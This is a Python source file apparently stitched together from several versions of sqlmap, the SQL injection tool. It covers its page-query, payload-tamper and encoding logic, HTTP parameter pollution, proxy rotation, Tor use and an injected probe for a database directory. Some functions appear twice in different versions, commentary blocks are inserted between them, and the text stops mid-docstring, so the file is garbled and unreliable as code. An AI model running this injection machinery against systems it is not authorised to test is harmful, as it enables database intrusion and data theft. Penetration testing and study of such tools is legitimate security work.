def __retryProxy(**kwargs):
    threadData = getCurrentThreadData()
    threadData.retriesCount += 1

    if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME:
        # time-based payloads can cause web server unresponsiveness
        # if the injectable piece of code is some kind of JOIN-like query
        warnMsg = "most probably web server instance hasn't recovered yet "
        warnMsg += "from previous time-based payload. If the problem "
        warnMsg += "persists please wait for a few minutes and rerun "
        warnMsg += "without flag T in --technique option "
        warnMsg += "(e.g. --flush-session --technique=BEUS) or try to "
        warnMsg += "lower the --time-sec value (e.g. --time-sec=2)"
        singleTimeWarnMessage(warnMsg)
    elif kb.originalPage is None:
        warnMsg = "if the problem persists please check that the provided "
        warnMsg += "target URL is valid. If it is, you can try to rerun "
        warnMsg += "with the --random-agent switch turned on "
        warnMsg += "and/or proxy switches (--ignore-proxy, --proxy,...)"
        singleTimeWarnMessage(warnMsg)
    elif conf.threads > 1:
        warnMsg = "if the problem persists please try to lower "
        warnMsg += "the number of used threads (--threads)"
        singleTimeWarnMessage(warnMsg)

    time.sleep(1)

    kwargs['retrying'] = True
    return Connect.__getPageProxy(**kwargs)
def direct(query, content=True):
    select = True
    query = agent.payloadDirect(query)
    query = agent.adjustLateValues(query)
    threadData = getCurrentThreadData()

    if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query:
        query = "%s FROM DUAL" % query

    for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
        for sqlStatement in sqlStatements:
            if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement":
                select = False
                break

    if select and not query.upper().startswith("SELECT "):
        query = "SELECT " + query

    logger.log(9, query)

    output = hashDBRetrieve(query, True, True)
    start = time.time()

    if not select and "EXEC " not in query:
        _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
    elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query):
        output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None)
        hashDBWrite(query, output, True)
    elif output:
        infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20]
        logger.info(infoMsg)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    if not output:
        return output
    elif content:
        if output and isListLike(output):
            if len(output[0]) == 1:
                if len(output) > 1:
                    output = map(lambda _: _[0], output)
                else:
                    output = output[0][0]

        retVal = getUnicode(output, noneToNull=True)
        return safecharencode(retVal) if kb.safeCharEncode else retVal
    else:
        for line in output:
            if line[0] in (1, -1):
                return True
            else:
                return False
def direct(query, content=True):
    select = True
    query = agent.payloadDirect(query)
    query = agent.adjustLateValues(query)
    threadData = getCurrentThreadData()

    if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper():
        query = "%s FROM DUAL" % query

    for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
        for sqlStatement in sqlStatements:
            if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement":
                select = False
                break

    if select and not query.upper().startswith("SELECT "):
        query = "SELECT %s" % query

    logger.log(CUSTOM_LOGGING.PAYLOAD, query)

    output = hashDBRetrieve(query, True, True)
    start = time.time()

    if not select and "EXEC " not in query.upper():
        timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None)
    elif not (output and ("%soutput" % TAKEOVER_TABLE_PREFIX) not in query and ("%sfile" % TAKEOVER_TABLE_PREFIX) not in query):
        output, state = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None)

        if state == TIMEOUT_STATE.NORMAL:
            hashDBWrite(query, output, True)
        elif state == TIMEOUT_STATE.TIMEOUT:
            conf.dbmsConnector.close()
            conf.dbmsConnector.connect()
    elif output:
        infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20]
        logger.info(infoMsg)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    if not output:
        return output
    elif content:
        if output and isListLike(output):
            if len(output[0]) == 1:
                output = [_[0] for _ in output]

        retVal = getUnicode(output, noneToNull=True)
        return safecharencode(retVal) if kb.safeCharEncode else retVal
    else:
        return extractExpectedValue(output, EXPECTED.BOOL)
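# --- Illustrative sketch (not part of sqlmap): direct() above relies on a
# timeout(func=..., args=..., duration=..., default=...) helper (sqlmap's own
# implementation lives in lib/core/common.py). A minimal standalone version of
# that calling convention, assuming the wrapped call is safe to abandon in a
# daemon thread when it exceeds the allotted time:
import threading

def timeoutSketch(func, args=(), duration=30, default=None):
    result = [default]

    def worker():
        result[0] = func(*args)

    thread = threading.Thread(target=worker)
    thread.daemon = True  # a hung DBMS call won't block interpreter exit
    thread.start()
    thread.join(duration)  # wait at most 'duration' seconds

    return result[0]  # still 'default' if the call didn't finish in time

# e.g. timeoutSketch(func=time.sleep, args=(5,), duration=1) returns None after ~1 second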
def _retryProxy(**kwargs):
    threadData = getCurrentThreadData()
    threadData.retriesCount += 1

    if conf.proxyList and threadData.retriesCount >= conf.retries:
        warnMsg = "changing proxy"
        logger.warn(warnMsg)

        conf.proxy = conf.proxyList[0]
        conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1]
        setHTTPProxy()

    if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME:
        # time-based payloads can cause web server unresponsiveness
        # if the injectable piece of code is some kind of JOIN-like query
        warnMsg = "most probably web server instance hasn't recovered yet "
        warnMsg += "from previous time-based payload. If the problem "
        warnMsg += "persists please wait for a few minutes and rerun "
        warnMsg += "without flag T in option '--technique' "
        warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to "
        warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')"
        singleTimeWarnMessage(warnMsg)
    elif kb.originalPage is None:
        if conf.tor:
            warnMsg = "please make sure that you have "
            warnMsg += "Tor installed and running so "
            warnMsg += "you could successfully use "
            warnMsg += "switch '--tor' "
            if IS_WIN:
                warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')"
            else:
                warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')"
        else:
            warnMsg = "if the problem persists please check that the provided "
            warnMsg += "target URL is valid. In case that it is, you can try to rerun "
            warnMsg += "with the switch '--random-agent' turned on "
            warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)"
        singleTimeWarnMessage(warnMsg)
    elif conf.threads > 1:
        warnMsg = "if the problem persists please try to lower "
        warnMsg += "the number of used threads (option '--threads')"
        singleTimeWarnMessage(warnMsg)

    time.sleep(1)

    kwargs['retrying'] = True
    return Connect._getPageProxy(**kwargs)
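# --- Illustrative note (not part of sqlmap): the slicing idiom used above,
# conf.proxyList[1:] + conf.proxyList[:1], rotates the list one position to
# the left, so consecutive retry rounds cycle through all configured proxies
# in round-robin fashion:
proxyListSketch = ["http://127.0.0.1:8080", "http://127.0.0.1:8118", "http://127.0.0.1:9050"]
proxyListSketch = proxyListSketch[1:] + proxyListSketch[:1]
# -> ["http://127.0.0.1:8118", "http://127.0.0.1:9050", "http://127.0.0.1:8080"]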
def _getDatabaseDir(self):
    retVal = None

    infoMsg = "searching for database directory"
    logger.info(infoMsg)

    randStr = randomStr()
    inject.checkBooleanExpression("EXISTS(SELECT * FROM %s.%s WHERE [RANDNUM]=[RANDNUM])" % (randStr, randStr))

    if wasLastResponseDBMSError():
        threadData = getCurrentThreadData()
        match = re.search(r"Could not find file\s+'([^']+?)'", threadData.lastErrorPage[1])

        if match:
            retVal = match.group(1).rstrip("%s.mdb" % randStr)

            if retVal.endswith('\\'):
                retVal = retVal[:-1]

    return retVal
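# --- Illustrative note (not part of sqlmap): str.rstrip(chars) strips a *set*
# of trailing characters, not a literal suffix, so rstrip("%s.mdb" % randStr)
# above removes any trailing run of characters drawn from the random table
# name plus ".mdb", leaving the directory part of the reported path
# ("kzvpx" below is a hypothetical stand-in for randStr):
print(r"C:\inetpub\wwwroot\kzvpx.mdb".rstrip("kzvpx.mdb"))  # C:\inetpub\wwwroot\
# the trailing backslash is then trimmed by the endswith('\\') check above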
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
    """
    This method calls a function to get the target URL page content
    and returns its page MD5 hash or a boolean value in case of
    string match check ('--string' command line parameter)
    """

    if conf.direct:
        return direct(value, content)

    get = None
    post = None
    cookie = None
    ua = None
    referer = None
    host = None
    page = None
    pageLength = None
    uri = None
    code = None
    skipUrlEncode = conf.skipUrlEncode

    if not place:
        place = kb.injection.place or PLACE.GET

    raise404 = place != PLACE.URI if raise404 is None else raise404

    value = agent.adjustLateValues(value)
    payload = agent.extractPayload(value)
    threadData = getCurrentThreadData()

    if skipUrlEncode is None and conf.httpHeaders:
        headers = dict(conf.httpHeaders)
        _ = max(headers[_] if _.upper() == HTTPHEADER.CONTENT_TYPE.upper() else None for _ in headers.keys())

        if _ and "urlencoded" not in _:
            skipUrlEncode = True

    if payload:
        if kb.tamperFunctions:
            for function in kb.tamperFunctions:
                payload = function(payload=payload, headers=auxHeaders)

                if not isinstance(payload, basestring):
                    errMsg = "tamper function '%s' returns " % function.func_name
                    errMsg += "invalid payload type ('%s')" % type(payload)
                    raise SqlmapValueException, errMsg

            value = agent.replacePayload(value, payload)

        logger.log(CUSTOM_LOGGING.PAYLOAD, safecharencode(payload))

        if place == PLACE.CUSTOM_POST:
            if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
                # payloads in SOAP/XML should have chars > and < replaced
                # with their HTML encoded counterparts
                payload = payload.replace('>', "&gt;").replace('<', "&lt;")
            elif kb.postHint == POST_HINT.JSON:
                if payload.startswith('"') and payload.endswith('"'):
                    payload = json.dumps(payload[1:-1])
                else:
                    payload = json.dumps(payload)[1:-1]

            value = agent.replacePayload(value, payload)
        else:
            if place != PLACE.URI or (value and payload and '?' in value and value.find('?') < value.find(payload)):
                # GET, URI and Cookie need to be thoroughly URL encoded (POST is encoded down below)
                payload = urlencode(payload, '%', False, True) if place in (PLACE.GET, PLACE.COOKIE, PLACE.URI) and not skipUrlEncode else payload
                value = agent.replacePayload(value, payload)

    if conf.hpp:
        if not any(conf.url.lower().endswith(_.lower()) for _ in (WEB_API.ASP, WEB_API.ASPX)):
            warnMsg = "HTTP parameter pollution should work only against "
            warnMsg += "ASP(.NET) targets"
            singleTimeWarnMessage(warnMsg)

        if place in (PLACE.GET, PLACE.POST):
            _ = re.escape(PAYLOAD_DELIMITER)
            match = re.search("(?P<name>\w+)=%s(?P<value>.+?)%s" % (_, _), value)

            if match:
                payload = match.group("value")

                for splitter in (urlencode(' '), ' '):
                    if splitter in payload:
                        prefix, suffix = ("*/", "/*") if splitter == ' ' else (urlencode(_) for _ in ("*/", "/*"))
                        parts = payload.split(splitter)
                        parts[0] = "%s%s" % (parts[0], suffix)
                        parts[-1] = "%s%s=%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[-1])

                        for i in xrange(1, len(parts) - 1):
                            parts[i] = "%s%s=%s%s%s" % (DEFAULT_GET_POST_DELIMITER, match.group("name"), prefix, parts[i], suffix)

                        payload = "".join(parts)

                for splitter in (urlencode(','), ','):
                    payload = payload.replace(splitter, "%s%s=" % (DEFAULT_GET_POST_DELIMITER, match.group("name")))

                value = agent.replacePayload(value, payload)
        else:
            warnMsg = "HTTP parameter pollution works only with regular "
            warnMsg += "GET and POST parameters"
            singleTimeWarnMessage(warnMsg)

    if place:
        value = agent.removePayloadDelimiters(value)

    if conf.checkPayload:
        checkPayload(value)

    if PLACE.GET in conf.parameters:
        get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value

    if PLACE.POST in conf.parameters:
        post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value

    if PLACE.CUSTOM_POST in conf.parameters:
        post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value

    if PLACE.COOKIE in conf.parameters:
        cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value

    if PLACE.USER_AGENT in conf.parameters:
        ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value

    if PLACE.REFERER in conf.parameters:
        referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value

    if PLACE.HOST in conf.parameters:
        host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value

    if PLACE.URI in conf.parameters:
        uri = conf.url if place != PLACE.URI or not value else value
    else:
        uri = conf.url

    if conf.rParam:
        def _randomizeParameter(paramString, randomParameter):
            retVal = paramString
            match = re.search("%s=(?P<value>[^&;]+)" % randomParameter, paramString)

            if match:
                origValue = match.group("value")
                retVal = re.sub("%s=[^&;]+" % randomParameter, "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)

            return retVal

        for randomParameter in conf.rParam:
            for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
                if item in conf.parameters:
                    if item == PLACE.GET and get:
                        get = _randomizeParameter(get, randomParameter)
                    elif item == PLACE.POST and post:
                        post = _randomizeParameter(post, randomParameter)
                    elif item == PLACE.COOKIE and cookie:
                        cookie = _randomizeParameter(cookie, randomParameter)

    if conf.evalCode:
        delimiter = conf.pDel or DEFAULT_GET_POST_DELIMITER
        variables = {}
        originals = {}

        for item in filter(None, (get, post)):
            for part in item.split(delimiter):
                if '=' in part:
                    name, value = part.split('=', 1)
                    evaluateCode("%s=%s" % (name, repr(value)), variables)

        originals.update(variables)
        evaluateCode(conf.evalCode, variables)

        for name, value in variables.items():
            if name != "__builtins__" and originals.get(name, "") != value:
                if isinstance(value, (basestring, int)):
                    value = unicode(value)

                    if '%s=' % name in (get or ""):
                        get = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, get)
                    elif '%s=' % name in (post or ""):
                        post = re.sub("((\A|\W)%s=)([^%s]+)" % (name, delimiter), "\g<1>%s" % value, post)
                    elif post is not None:
                        post += "%s%s=%s" % (delimiter, name, value)
                    else:
                        get += "%s%s=%s" % (delimiter, name, value)

    get = urlencode(get, limit=True)

    if post is not None:
        if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
            post = getattr(post, UNENCODED_ORIGINAL_VALUE)
        elif not skipUrlEncode and kb.postHint not in POST_HINT_CONTENT_TYPES.keys():
            post = urlencode(post)

    if timeBasedCompare:
        if len(kb.responseTimes) < MIN_TIME_RESPONSES:
            clearConsoleLine()

            if conf.tor:
                warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
                warnMsg += "time-based injections because of its high latency time"
                singleTimeWarnMessage(warnMsg)

            warnMsg = "time-based comparison needs larger statistical "
            warnMsg += "model. Making a few dummy requests, please wait.."
            singleTimeWarnMessage(warnMsg)

            while len(kb.responseTimes) < MIN_TIME_RESPONSES:
                Connect.queryPage(content=True)

            deviation = stdev(kb.responseTimes)

            if deviation > WARN_TIME_STDEV:
                kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE

                warnMsg = "there is considerable lagging "
                warnMsg += "in connection response(s). Please use as high "
                warnMsg += "value for option '--time-sec' as possible (e.g. "
                warnMsg += "%d or more)" % (conf.timeSec * 2)
                logger.critical(warnMsg)
        elif not kb.testMode:
            warnMsg = "it is very important not to stress the network adapter's "
            warnMsg += "bandwidth during usage of time-based queries"
            singleTimeWarnMessage(warnMsg)

    if conf.safUrl and conf.saFreq > 0:
        kb.queryCounter += 1
        if kb.queryCounter % conf.saFreq == 0:
            Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host)

    start = time.time()

    if kb.nullConnection and not content and not response and not timeBasedCompare:
        noteResponseTime = False

        if kb.nullConnection == NULLCONNECTION.HEAD:
            method = HTTPMETHOD.HEAD
        elif kb.nullConnection == NULLCONNECTION.RANGE:
            if not auxHeaders:
                auxHeaders = {}

            auxHeaders[HTTPHEADER.RANGE] = "bytes=-1"

        _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404)

        if headers:
            if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers:
                pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH])
            elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers:
                pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:])

    if not pageLength:
        page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)

    if conf.secondOrder:
        page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)

    threadData.lastQueryDuration = calculateDeltaSeconds(start)

    kb.originalCode = kb.originalCode or code

    if kb.testMode:
        kb.testQueryCount += 1

    if timeBasedCompare:
        return wasLastRequestDelayed()
    elif noteResponseTime:
        kb.responseTimes.append(threadData.lastQueryDuration)

    if not response and removeReflection:
        page = removeReflectiveValues(page, payload)

    kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
    kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None

    if content or response:
        return page, headers

    if getRatioValue:
        return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
    elif pageLength or page:
        return comparison(page, headers, code, getRatioValue, pageLength)
    else:
        return False
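# --- Illustrative sketch (not part of sqlmap): the NULLCONNECTION.RANGE branch
# above infers the full page size without downloading the body by sending
# "Range: bytes=-1" and reading the total that follows '/' in the returned
# Content-Range header:
def contentRangeTotalSketch(headerValue):
    # e.g. "bytes 1023-1023/1024" -> 1024
    return int(headerValue[headerValue.find('/') + 1:])

assert contentRangeTotalSketch("bytes 1023-1023/1024") == 1024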
def getPage(**kwargs):
    """
    This method connects to the target URL or proxy and returns
    the target URL page content
    """

    if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
        time.sleep(conf.delay)
    elif conf.cpuThrottle:
        cpuThrottle(conf.cpuThrottle)

    if conf.dummy:
        return randomStr(int(randomInt()), alphabet=[chr(_) for _ in xrange(256)]), {}, int(randomInt())

    threadData = getCurrentThreadData()
    with kb.locks.request:
        kb.requestCounter += 1
        threadData.lastRequestUID = kb.requestCounter

    url = kwargs.get("url", None) or conf.url
    get = kwargs.get("get", None)
    post = kwargs.get("post", None)
    method = kwargs.get("method", None)
    cookie = kwargs.get("cookie", None)
    ua = kwargs.get("ua", None) or conf.agent
    referer = kwargs.get("referer", None) or conf.referer
    host = kwargs.get("host", None) or conf.host
    direct_ = kwargs.get("direct", False)
    multipart = kwargs.get("multipart", False)
    silent = kwargs.get("silent", False)
    raise404 = kwargs.get("raise404", True)
    timeout = kwargs.get("timeout", None) or conf.timeout
    auxHeaders = kwargs.get("auxHeaders", None)
    response = kwargs.get("response", False)
    ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout
    refreshing = kwargs.get("refreshing", False)
    retrying = kwargs.get("retrying", False)
    crawling = kwargs.get("crawling", False)
    skipRead = kwargs.get("skipRead", False)

    if not urlparse.urlsplit(url).netloc:
        url = urlparse.urljoin(conf.url, url)

    # flag to know if we are dealing with the same target host
    target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""]))

    if not retrying:
        # Reset the number of connection retries
        threadData.retriesCount = 0

    # fix for known issue when urllib2 just skips the other part of provided
    # URL split with a space char while urlencoding it in the later phase
    url = url.replace(" ", "%20")

    conn = None
    code = None
    page = None

    _ = urlparse.urlsplit(url)
    requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET))
    requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url
    responseMsg = u"HTTP response "
    requestHeaders = u""
    responseHeaders = None
    logHeaders = u""
    skipLogTraffic = False

    raise404 = raise404 and not kb.ignoreNotFound

    # support for non-latin (e.g. cyrillic) URLs as urllib/urllib2 doesn't
    # support those by default
    url = asciifyUrl(url)

    # fix for known issues when using url in unicode format
    # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case)
    url = unicodeencode(url)

    try:
        socket.setdefaulttimeout(timeout)

        if direct_:
            if '?' in url:
                url, params = url.split('?', 1)
                params = urlencode(params)
                url = "%s?%s" % (url, params)
                requestMsg += "?%s" % params
        elif multipart:
            # Needed in this form because of potential circle dependency
            # problem (option -> update -> connect -> option)
            from lib.core.option import proxyHandler

            multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
            conn = multipartOpener.open(unicodeencode(url), multipart)
            page = Connect._connReadProxy(conn) if not skipRead else None
            responseHeaders = conn.info()
            responseHeaders[URI_HTTP_HEADER] = conn.geturl()
            page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))

            return page
        elif any((refreshing, crawling)):
            pass
        elif target:
            if conf.forceSSL and urlparse.urlparse(url).scheme != "https":
                url = re.sub("\Ahttp:", "https:", url, re.I)
                url = re.sub(":80/", ":443/", url, re.I)

            if PLACE.GET in conf.parameters and not get:
                get = conf.parameters[PLACE.GET]

                if not conf.skipUrlEncode:
                    get = urlencode(get, limit=True)

            if get:
                url = "%s?%s" % (url, get)
                requestMsg += "?%s" % get

            if PLACE.POST in conf.parameters and not post and method in (None, HTTPMETHOD.POST):
                post = conf.parameters[PLACE.POST]
        elif get:
            url = "%s?%s" % (url, get)
            requestMsg += "?%s" % get

        requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str

        # Prepare HTTP headers
        headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer})

        if kb.authHeader:
            headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader

        if kb.proxyAuthHeader:
            headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader

        headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE
        headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity"
        headers[HTTP_HEADER.HOST] = host or getHostHeader(url)

        if post is not None and HTTP_HEADER.CONTENT_TYPE not in headers:
            headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE)

        if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]:
            warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE
            warnMsg += "Will try to reconstruct"
            singleTimeWarnMessage(warnMsg)

            boundary = findMultipartPostBoundary(conf.data)
            if boundary:
                headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary)

        if auxHeaders:
            for key, item in auxHeaders.items():
                headers[key] = item

        for key, item in headers.items():
            del headers[key]
            headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding)

        post = unicodeencode(post, kb.pageEncoding)

        if method:
            req = MethodRequest(url, post, headers)
            req.set_method(method)
        else:
            req = urllib2.Request(url, post, headers)

        requestHeaders += "\n".join("%s: %s" % (key.capitalize() if isinstance(key, basestring) else key, getUnicode(value)) for (key, value) in req.header_items())

        if not getRequestHeader(req, HTTP_HEADER.COOKIE) and conf.cj:
            conf.cj._policy._now = conf.cj._now = int(time.time())
            cookies = conf.cj._cookies_for_request(req)
            requestHeaders += "\n%s" % ("Cookie: %s" % ";".join("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value)) for cookie in cookies))

        if post is not None:
            if not getRequestHeader(req, HTTP_HEADER.CONTENT_LENGTH):
                requestHeaders += "\n%s: %d" % (string.capwords(HTTP_HEADER.CONTENT_LENGTH), len(post))

        if not getRequestHeader(req, HTTP_HEADER.CONNECTION):
            requestHeaders += "\n%s: close" % HTTP_HEADER.CONNECTION

        requestMsg += "\n%s" % requestHeaders

        if post is not None:
            requestMsg += "\n\n%s" % getUnicode(post)

        requestMsg += "\n"

        threadData.lastRequestMsg = requestMsg

        logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)

        conn = urllib2.urlopen(req)

        if not kb.authHeader and getRequestHeader(req, HTTP_HEADER.AUTHORIZATION) and conf.authType == AUTH_TYPE.BASIC:
            kb.authHeader = getRequestHeader(req, HTTP_HEADER.AUTHORIZATION)

        if not kb.proxyAuthHeader and getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION):
            kb.proxyAuthHeader = getRequestHeader(req, HTTP_HEADER.PROXY_AUTHORIZATION)

        # Return response object
        if response:
            return conn, None, None

        # Get HTTP response
        if hasattr(conn, 'redurl'):
            page = (threadData.lastRedirectMsg[1] if kb.redirectChoice == REDIRECTION.NO else Connect._connReadProxy(conn)) if not skipRead else None
            skipLogTraffic = kb.redirectChoice == REDIRECTION.NO
            code = conn.redcode
        else:
            page = Connect._connReadProxy(conn) if not skipRead else None

        code = code or conn.code
        responseHeaders = conn.info()
        responseHeaders[URI_HTTP_HEADER] = conn.geturl()
        page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
        status = getUnicode(conn.msg)

        if extractRegexResult(META_REFRESH_REGEX, page) and not refreshing:
            url = extractRegexResult(META_REFRESH_REGEX, page)

            debugMsg = "got HTML meta refresh header"
            logger.debug(debugMsg)

            if kb.alwaysRefresh is None:
                msg = "sqlmap got a refresh request "
                msg += "(redirect like response common to login pages). "
                msg += "Do you want to apply the refresh "
                msg += "from now on (or stay on the original page)? [Y/n]"
                choice = readInput(msg, default="Y")

                kb.alwaysRefresh = choice not in ("n", "N")

            if kb.alwaysRefresh:
                if url.lower().startswith('http://'):
                    kwargs['url'] = url
                else:
                    kwargs['url'] = conf.url[:conf.url.rfind('/') + 1] + url

                threadData.lastRedirectMsg = (threadData.lastRequestUID, page)
                kwargs['refreshing'] = True
                kwargs['get'] = None
                kwargs['post'] = None

                try:
                    return Connect._getPageProxy(**kwargs)
                except SqlmapSyntaxException:
                    pass

        # Explicit closing of connection object
        if not conf.keepAlive:
            try:
                if hasattr(conn.fp, '_sock'):
                    conn.fp._sock.close()
                conn.close()
            except Exception, msg:
                warnMsg = "problem occurred during connection closing ('%s')" % msg
                logger.warn(warnMsg)

    except urllib2.HTTPError, e:
        page = None
        responseHeaders = None

        try:
            page = e.read() if not skipRead else None
            responseHeaders = e.info()
            responseHeaders[URI_HTTP_HEADER] = e.geturl()
            page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))
        except socket.timeout:
            warnMsg = "connection timed out while trying "
            warnMsg += "to get error page information (%d)" % e.code
            logger.warn(warnMsg)
            return None, None, None
        except KeyboardInterrupt:
            raise
        except:
            pass
        finally:
            page = page if isinstance(page, unicode) else getUnicode(page)

        code = e.code
        threadData.lastHTTPError = (threadData.lastRequestUID, code)

        kb.httpErrorCodes[code] = kb.httpErrorCodes.get(code, 0) + 1

        status = getUnicode(e.msg)
        responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)

        if responseHeaders:
            logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items())

        logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))

        skipLogTraffic = True

        if conf.verbose <= 5:
            responseMsg += getUnicode(logHeaders)
        elif conf.verbose > 5:
            responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])

        logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)

        if e.code == httplib.UNAUTHORIZED:
            errMsg = "not authorized, try to provide right HTTP "
            errMsg += "authentication type and valid credentials (%d)" % code
            raise SqlmapConnectionException(errMsg)
        elif e.code == httplib.NOT_FOUND:
            if raise404:
                errMsg = "page not found (%d)" % code
                raise SqlmapConnectionException(errMsg)
            else:
                debugMsg = "page not found (%d)" % code
                singleTimeLogMessage(debugMsg, logging.DEBUG)
                processResponse(page, responseHeaders)
        elif e.code == httplib.GATEWAY_TIMEOUT:
            if ignoreTimeout:
                return None, None, None
            else:
                warnMsg = "unable to connect to the target URL (%d - %s)" % (e.code, httplib.responses[e.code])

                if threadData.retriesCount < conf.retries and not kb.threadException:
                    warnMsg += ". sqlmap is going to retry the request"
                    logger.critical(warnMsg)
                    return Connect._retryProxy(**kwargs)
                elif kb.testMode:
                    logger.critical(warnMsg)
                    return None, None, None
                else:
                    raise SqlmapConnectionException(warnMsg)
        else:
            debugMsg = "got HTTP error code: %d (%s)" % (code, status)
            logger.debug(debugMsg)
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
    """
    This method calls a function to get the target URL page content
    and returns its page MD5 hash or a boolean value in case of
